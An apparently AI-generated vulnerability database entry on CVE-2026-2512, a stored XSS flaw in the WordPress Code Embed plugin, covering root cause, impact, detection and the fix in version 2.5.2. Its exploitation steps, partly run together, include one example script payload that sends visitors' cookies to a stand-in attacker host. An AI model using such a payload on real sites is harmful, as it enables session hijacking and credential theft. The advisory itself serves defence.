
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2512 is a Stored Cross-Site Scripting (XSS) vulnerability in the Code Embed plugin for WordPress (also known as Simple Embed Code, by dartiss/davidartiss), affecting all versions up to and including 2.5.1. The flaw allows authenticated attackers with Contributor-level access or above to inject arbitrary web scripts into pages that execute when any user visits the affected page. It was published on March 18, 2026, with a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, ENISA EUVD).
The root cause is improper neutralization of input during web page generation (CWE-79). The plugin's sanitization function sec_check_post_fields() is only triggered on the save_post hook; however, WordPress also allows custom fields to be added via the wp_ajax_add_meta AJAX endpoint, which does not trigger save_post. As a result, an attacker can inject malicious script content into custom field meta values through this AJAX endpoint, bypassing sanitization entirely. The ce_filter() function subsequently outputs these unsanitized meta values directly into page content without escaping, enabling persistent script execution (Wordfence, WordPress Trac).
Successful exploitation allows an authenticated attacker with at minimum Contributor-level access to store malicious JavaScript in WordPress pages, which then executes in the browsers of any user — including administrators — who visits the injected page. This can lead to session hijacking, credential theft, unauthorized administrative actions, defacement, or further compromise of the WordPress site and its users. The changed scope (S:C) in the CVSS vector reflects that the impact extends beyond the attacker's own session to affect other users (Wordfence, ENISA EUVD).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2026-2512 as of the available data. The EPSS score is approximately 0.032%, indicating a low probability of exploitation in the near term. The vulnerability requires at least Contributor-level authentication, which limits the attack surface compared to unauthenticated vulnerabilities. It has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence).
save_post and the sanitization function), use the wp_ajax_add_meta AJAX endpoint to add a custom field meta value containing a malicious JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).sec_check_post_fields() only runs on save_post, the injected payload is stored in the database without sanitization.ce_filter() outputs the unsanitized meta value, the injected script executes in their browser, enabling session hijacking, credential theft, or further attacks (Wordfence, WordPress Trac).wp-admin/admin-ajax.php with action=add-meta from Contributor-level accounts, particularly adding custom fields with script tags or encoded JavaScript payloads.wp_postmeta table associated with posts managed by the Code Embed plugin, containing <script>, javascript:, or encoded variants thereof.includes/add-embeds.php or includes/secure.php.Update the Code Embed (Simple Embed Code) plugin to version 2.5.2 or later, which includes the fix applied in changeset 3482994 that addresses the sanitization bypass (WordPress Trac Changeset). As a temporary workaround, restrict Contributor-level user registration and limit the ability of untrusted users to add or edit custom fields. Site administrators should audit existing custom field meta values for suspicious script content. Upgrading to the patched version is the recommended and definitive remediation (Wordfence).
Wordfence disclosed the vulnerability as part of their weekly WordPress vulnerability report for the period of March 16–22, 2026, providing technical details and remediation guidance (Wordfence Blog). No significant broader media coverage or notable researcher commentary beyond the Wordfence disclosure has been identified for this vulnerability.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."